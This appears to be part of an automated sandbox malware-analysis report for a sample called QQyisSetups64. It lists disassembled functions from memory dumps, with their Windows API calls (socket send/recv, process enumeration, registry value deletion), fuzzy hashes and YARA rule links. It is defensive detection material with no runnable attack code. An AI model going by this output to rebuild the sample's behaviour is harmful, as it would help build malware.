WaitForSingleObject.KERNEL32(?,000000FF), ref: 037848EC
Sleep.KERNEL32(00000258), ref: 037848F9
CloseHandle.KERNEL32(?), ref: 03784914
CloseHandle.KERNEL32(?), ref: 0378491D
Sleep.KERNEL32(0000012C), ref: 0378492E

Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: 8d60a59ba238719cdd65f4c139c814ee50d5409d8bf4fd28ddb41aa9d5f06715
Instruction ID: e1ef279e5d2662cfce6ee3f16de06b7f94eebe89e2444d2fe20df5d8e9b7cccb
Opcode Fuzzy Hash: 8d60a59ba238719cdd65f4c139c814ee50d5409d8bf4fd28ddb41aa9d5f06715
Instruction Fuzzy Hash: 5CF030763447055BC624FBADDC84D4AF3E9EFC9720B258B09E265872D4CA75E801CBA0

Function 03783300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 03783311
Sleep.KERNEL32(00000258), ref: 0378331E
InterlockedExchange.KERNEL32(?,00000000), ref: 03783326
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03783332
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0378333A
Sleep.KERNEL32(0000012C), ref: 0378334B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: dc18d3566e24cde115043f96ee590521b45e4cb7615e5a28ba1a6b5954708d87
Instruction ID: 6708b8998761e465dcb3af7b79ed5e1883ec556028a6ed1fb9c7845587a7f06e
Opcode Fuzzy Hash: dc18d3566e24cde115043f96ee590521b45e4cb7615e5a28ba1a6b5954708d87
Instruction Fuzzy Hash: 37F082722047046BD610ABA9DC84D46F3E8AFC9334B218B09F221832D5CAB4E801CB60

Function 0360719F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 036071C3
_memset.LIBCMT ref: 0360720F

Part of subcall function 036080DF: _vswprintf_s.LIBCMT ref: 036080F0

_memset.LIBCMT ref: 036072E2
_memset.LIBCMT ref: 03607373

Strings

D, xrefs: 036071FF

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_vswprintf_s
String ID: D
API String ID: 3424173483-2746444292
Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
Instruction ID: 025f5983f1731cc6c3cd4b7c3e7767bed5427154a0b1c2e848f2fb33f1f08071
Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
Instruction Fuzzy Hash: 6A81B4719403187BE725DB658C8AFEB777CEF95701F500098F709A61C1DBB06B858B68

Function 037A095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 037A096E

Part of subcall function 037A08C9: ___BuildCatchObjectHelper.LIBCMT ref: 037A08FF

_UnwindNestedFrames.LIBCMT ref: 037A0985
___FrameUnwindToState.LIBCMT ref: 037A0993

Strings

csm, xrefs: 037A095D
csm, xrefs: 037A096A, 037A097F, 037A0992, 037A09B0, 037A09C0

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction ID: 58d32dd202cc358f94355fffb807ce421545725f687b458e06bd79026a61022b
Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction Fuzzy Hash: 4E014675401A09BFEF12AF55CC48EAABF6AEF88350F048614FC0818120D736D9B1EBA0

Function 02C93A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 02C93A63

Part of subcall function 02C939BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C939F4

_UnwindNestedFrames.LIBCMT ref: 02C93A7A
___FrameUnwindToState.LIBCMT ref: 02C93A88

Strings

csm, xrefs: 02C93A5F, 02C93A74, 02C93A87, 02C93AA5, 02C93AB5
csm, xrefs: 02C93A52

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: a710b76326aa2080a895a6dfec9dddad4f2ca550fbea03382f66afa275e5dd76
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: 3601F231441149BBDF12AFA1CC48EAB7FAAFF48354F008054FD5916120DB36DAB1EBA1

Function 0378B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0378B800
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0378B810
RegCloseKey.ADVAPI32(?), ref: 0378B81B

Strings

IpDatespecial, xrefs: 0378B80A
Console, xrefs: 0378B7F6

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Console$IpDatespecial
API String ID: 849931509-1840232981
Opcode ID: f9098454d53f1fb9159dffe004c7b2ed84798e01c3a08ff4ddd82b10d3a4302a
Instruction ID: 97c7fefa31031b16ff81613b0ec9bcf855f9df3f34c5fe1547905de30d2c8831
Opcode Fuzzy Hash: f9098454d53f1fb9159dffe004c7b2ed84798e01c3a08ff4ddd82b10d3a4302a
Instruction Fuzzy Hash: 6DE08672345644AFD314A764AC4FF9BB754F7CC711F008A1DFA84A11428555E440E765

Function 0378B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,453DC9E3), ref: 0378B9DA
_memset.LIBCMT ref: 0378B9FB
_memset.LIBCMT ref: 0378BA4B
Process32FirstW.KERNEL32(00000000,?), ref: 0378BA65
Process32NextW.KERNEL32(00000000,0000022C), ref: 0378BAB7

Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
String ID:
API String ID: 2416807333-0
Opcode ID: 5ddac39539a806a9a1dd268ed0628f26af67b41067b953204a71e2e8505834b7
Instruction ID: 32ad71a3362fb57fe5cfcad6392fa238dd401cbee0f4c0ae8c9f76e19d4b9da9
Opcode Fuzzy Hash: 5ddac39539a806a9a1dd268ed0628f26af67b41067b953204a71e2e8505834b7
Instruction Fuzzy Hash: 7C412971980605DFEB10FF60CC89FEAB7B8EF44710F048299D9159B2C0E7759940CB91

Function 036095EF Relevance: 7.6, APIs: 5, Instructions: 108COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 036095FE

Part of subcall function 0360F032: __FF_MSGBANNER.LIBCMT ref: 0360F04B
Part of subcall function 0360F032: __NMSG_WRITE.LIBCMT ref: 0360F052

_free.LIBCMT ref: 03609622
_memset.LIBCMT ref: 0360967A
_free.LIBCMT ref: 036096A3
_free.LIBCMT ref: 036096E2

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free$_malloc_memset
String ID:
API String ID: 2102557794-0
Opcode ID: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
Instruction ID: 3196f62d766dc1c64797afd41a9597a333353e417036359686a8e62244e4f6c9
Opcode Fuzzy Hash: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
Instruction Fuzzy Hash: F731D2B26103156BE318DF29D981747B7D9BF44300F08853AD909CB792E7B1E460CB94

Function 03783CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000598,00000000), ref: 03783CBF
SetLastError.KERNEL32(00000000,?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783CFA
GetLastError.KERNEL32(00000000), ref: 03783D45
WSAGetLastError.WS2_32(?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783D7B
WSASetLastError.WS2_32(0000000D,?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783DA2

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: caee4a16645f4e7298ddd2b0e6a9b6fbb133871e0ccb5163950dc2a5ac276f73
Instruction ID: 42d1e0d2dc900fd36d8469b2899491ef12c4076e6d852e4f9ef1c58c7779dbeb
Opcode Fuzzy Hash: caee4a16645f4e7298ddd2b0e6a9b6fbb133871e0ccb5163950dc2a5ac276f73
Instruction Fuzzy Hash: A631047E6442008FFB24FF6CD8C8B6977A8FB85724F040166ED05DB38AD775D8408A60

Function 02C83CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000598,00000000), ref: 02C83CBF
SetLastError.KERNEL32(00000000,?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83CFA
GetLastError.KERNEL32(00000000), ref: 02C83D45
WSAGetLastError.WS2_32(?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83D7B
WSASetLastError.WS2_32(0000000D,?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83DA2

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: eab49ec1abca4ddfd05981be808396bbceff9fbab7ef3c4076877acc5f78812c
Instruction ID: 2da670a1c088051bbee64e46735816d6bf419ae482dea3f1bfd5c5d6904c678e
Opcode Fuzzy Hash: eab49ec1abca4ddfd05981be808396bbceff9fbab7ef3c4076877acc5f78812c
Instruction Fuzzy Hash: 62314C726142409FEB14BF28D8C876537A9FB8472CF5092A7EE05CF285E771D880CB51

Function 03790EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03790EF9

Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8

_free.LIBCMT ref: 03790F0C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: b0623035c4073877e587fb86006c77cfbc6b42e88159f500227cc1f94d770432
Instruction ID: 6b059411c48d35766b0481fb5d309fec832aee4c4a277d6eff9323c0e6888336
Opcode Fuzzy Hash: b0623035c4073877e587fb86006c77cfbc6b42e88159f500227cc1f94d770432
Instruction Fuzzy Hash: 4911E336568F19EEEF21FF74B808A5A379B9F802A0B154627E8499B180DB3486819794

Function 02C8E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02C8E5E5

Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8

_free.LIBCMT ref: 02C8E5F8

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: a6660efef51672e5056541a75c7d0f58c90eba7f05f1117777f6cf5edfe33cde
Instruction ID: e9d7d05e12f5cd4e8179b11c5426aac35fcbd96e5ed095706117f53b395e26c0
Opcode Fuzzy Hash: a6660efef51672e5056541a75c7d0f58c90eba7f05f1117777f6cf5edfe33cde
Instruction Fuzzy Hash: C611EC32944519ABCB223F74AC0C75B37969F843ACB21C925F4489B141FF34CA509F94

Function 028871F2 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 02887217
__calloc_crt.LIBCMT ref: 02887223
__getptd.LIBCMT ref: 02887230
_free.LIBCMT ref: 0288727A
__dosmaperr.LIBCMT ref: 02887285

Part of subcall function 028870E4: __getptd_noexit.LIBCMT ref: 028870E4

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 955811338-0
Opcode ID: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
Instruction ID: 5e7aad1964e6b6d67033b8cd8a8ff42b59a428f02d253efd8f12c75491e0186d
Opcode Fuzzy Hash: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
Instruction Fuzzy Hash: E811CC3E10470AAFEB21BFE9DC40DAB77FAEF453747204529F919CA250DB71D4018AA2

Function 0360F3E8 Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0360F40D
__calloc_crt.LIBCMT ref: 0360F419
__getptd.LIBCMT ref: 0360F426
_free.LIBCMT ref: 0360F470
__dosmaperr.LIBCMT ref: 0360F47B

Part of subcall function 0360F2DA: __getptd_noexit.LIBCMT ref: 0360F2DA

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
String ID:
API String ID: 955811338-0
Opcode ID: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
Instruction ID: 9943beb49d7de12986d85a5566eeb5b0f43708b323d605353cc103c3f820b871
Opcode Fuzzy Hash: 7820054a35e6ddd4bb865db21a2500f6fa213131538873e4e8a0834fb54b6030
Instruction Fuzzy Hash: 0A11E936104716BFE728EFA49C41D9B7798DF44274724002EF9158E2D1DBB1D41287B9

Function 03782C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03782C3F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03782C55
TranslateMessage.USER32(?), ref: 03782C64
DispatchMessageW.USER32(?), ref: 03782C6A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03782C78

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 2015114452-0
Opcode ID: c2356193d3885a7a3f0c861346f9912c3ef419d87846fa29784de7ea9bac0bd5
Instruction ID: 6af39c8fe686a6141ea15deb7e1067be092aa0dbdd286d5f5058b2ee2bebf61e
Opcode Fuzzy Hash: c2356193d3885a7a3f0c861346f9912c3ef419d87846fa29784de7ea9bac0bd5
Instruction Fuzzy Hash: D801A972A9430DB6E710F7D49C81FFA77ECAB44B11F504915FB00EA0C6DAA5E80187B9

Function 02C82BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C82BFF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C82C15
TranslateMessage.USER32(?), ref: 02C82C24
DispatchMessageW.USER32(?), ref: 02C82C2A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C82C38

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 2015114452-0
Opcode ID: 9a85831669008e95302f3c5a4109ce4b296db0e8139c92389a1c5242f6d5603f
Instruction ID: 3dd7ae45e748f5b424b52ae22d26af1b249b8978a464b35c473e0200e71af6da
Opcode Fuzzy Hash: 9a85831669008e95302f3c5a4109ce4b296db0e8139c92389a1c5242f6d5603f
Instruction Fuzzy Hash: C001CD72E8030976F620AAA59C55FBB73ACEB44B54F508A15FF05EA0C4DBB0E5018BB5

Function 0289367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 028936A2

Part of subcall function 02893232: __getptd.LIBCMT ref: 02893240
Part of subcall function 02893232: __getptd.LIBCMT ref: 0289324E

__getptd.LIBCMT ref: 028936AC

Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6

__getptd.LIBCMT ref: 028936BA
__getptd.LIBCMT ref: 028936C8
__getptd.LIBCMT ref: 028936D3

Part of subcall function 028932D7: __CallSettingFrame@12.LIBCMT ref: 02893323

Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937AF
Part of subcall function 028937A0: __getptd.LIBCMT ref: 028937BD

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
Instruction ID: 9f562da0054c9847d26542a1764dca9d0c54cea5de4b13d1e3d32c1b15944322
Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
Instruction Fuzzy Hash: 4011C6B9C00209DFDF00EFA8C944AAD7BB1FF08314F1484A9E814EB250EB39AA559F51

Function 03784B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03784B83
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03784B8D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03784BA0
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03784BA3

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3706e33754e007b0218aa734aa3f402d3688f7d551875a93d455183aa4b69d76
Instruction ID: 42f1aea25a11b9acd3babc56bd1753a3370345fc51e83a161fa580dca5477d0a
Opcode Fuzzy Hash: 3706e33754e007b0218aa734aa3f402d3688f7d551875a93d455183aa4b69d76
Instruction Fuzzy Hash: 02018F762046148BD720FB2AFCC4B5BB7E8EBC8324F064869E50683244C778E846CB60

Function 02C84B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B63
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B6D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B80
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C84B83

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b630166256608978c20d8252a043f865f455cdec79fd7366b11ac7fca79d7b8b
Instruction ID: 0319caaaaac47e6ae930d255e26c021955ed4a229b39bea00a11d4af6fdfa4ec
Opcode Fuzzy Hash: b630166256608978c20d8252a043f865f455cdec79fd7366b11ac7fca79d7b8b
Instruction Fuzzy Hash: 590167769006549FD721EB35FCC8B6BB7E8EB88358F054929E14683500C774F8458AE0

Function 0361FF6D Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0361FF95

Part of subcall function 0361FA76: __getptd.LIBCMT ref: 0361FA84
Part of subcall function 0361FA76: __getptd.LIBCMT ref: 0361FA92

__getptd.LIBCMT ref: 0361FF9F

Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A

__getptd.LIBCMT ref: 0361FFAD
__getptd.LIBCMT ref: 0361FFBB
__getptd.LIBCMT ref: 0361FFC6

Part of subcall function 0361FB1B: __CallSettingFrame@12.LIBCMT ref: 0361FB67

Part of subcall function 03620093: __getptd.LIBCMT ref: 036200A2
Part of subcall function 03620093: __getptd.LIBCMT ref: 036200B0

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
Instruction ID: ba43b04fcc54c452282ce60af23b23f25211e8348a9cad900306425b7afc6b9b
Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
Instruction Fuzzy Hash: 4C11F6B9D00309DFDB00EFA4D844AADBBB0FF08310F24C169E815AB350DB799A259F54

Function 0288E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0288E122

Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6

